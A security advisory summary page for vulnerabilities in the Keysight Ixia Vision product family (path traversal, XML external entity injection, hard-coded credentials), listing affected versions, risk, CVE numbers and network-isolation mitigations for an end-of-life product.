Keysight Ixia Vision Product Family (Update A)

MonitorCVSS 7.5ICS-CERT ICSA-25-063-02Mar 4, 2025

Attack path

Attack VectorNetwork

Auth RequiredNone

ComplexityLow

User InteractionNone needed

Summary

Multiple vulnerabilities in Keysight Ixia Vision Product Family (CWE-22 path traversal, CWE-611 XML external entity injection, CWE-321 use of hard-coded credentials or weak cryptography) allow an unauthenticated attacker with network access to read sensitive data or execute arbitrary code. Affected: Ixia Vision 6.3.1 and older. Vendor has not released a patched version and recommends discontinuing use of older software.

What this means

What could happen

An attacker with network access to Ixia Vision could read sensitive data from the device or execute arbitrary code, potentially disrupting network testing and visibility operations or exfiltrating configuration details.

Who's at risk

Network test and visibility equipment operators, particularly in telecom, enterprise networking, and industrial network monitoring roles. Ixia Vision is used for network performance testing, packet analysis, and traffic visibility in large deployments; compromise could disrupt network troubleshooting capabilities or expose sensitive test traffic.

How it could be exploited

An unauthenticated attacker on the network could send a crafted request to the Ixia Vision device (ports 80/443 or management interface) to exploit a path traversal or XML external entity vulnerability, gaining data access or code execution without credentials.

Prerequisites

Network access to the Ixia Vision management interface (typically port 80/443 or dedicated management port)
Device must be reachable from the attacker's network position

remotely exploitableno authentication requiredlow complexityhigh CVSS score (7.5)no patch available for current version

Exploitability

Some exploitation risk — EPSS score 6.5%

Affected products (1)

ProductAffected VersionsFix Status

Ixia Vision Product Family: 6.3.16.3.1No fix (EOL)

Remediation & Mitigation

0/5

Do now

0/2

WORKAROUNDRestrict network access to the Ixia Vision device to trusted engineering and test subnets only; do not expose the management interface to untrusted networks or the Internet

HARDENINGIf remote access to Ixia Vision is required, route it through a VPN concentrator with strict authentication and encryption; do not allow direct Internet-facing access

Schedule — requires maintenance window

0/2

Patching may require device reboot — plan for process interruption

HOTFIXDiscontinue use of Ixia Vision 6.3.1 and older versions; replace with current software versions from Keysight if available

HOTFIXContact Keysight support to confirm if a patched version is available for your deployment; if no patch exists and the device is critical, plan for replacement

Mitigations - no patch available

0/1

Ixia Vision Product Family: 6.3.1 has reached End of Life. The vendor will not release a patch. Apply the following compensating controls:

HARDENINGIsolate the Ixia Vision network segment from business networks and general IT infrastructure using a firewall or network access control list

CVEs (5)

CVE-2025-24494 CVE-2025-24521 CVE-2025-21095 CVE-2025-23416 CVE-2025-24525

View full CISA ICS-CERT advisory

↑↓ Navigate · Esc Close

API: /api/v1/advisories/92d50f57-bef5-4125-8097-8f9920483c68

Get OT security insights every Tuesday

Advisory breakdowns, a weekly summary, and incident analyses for the people actually defending OT environments. Free, no account required.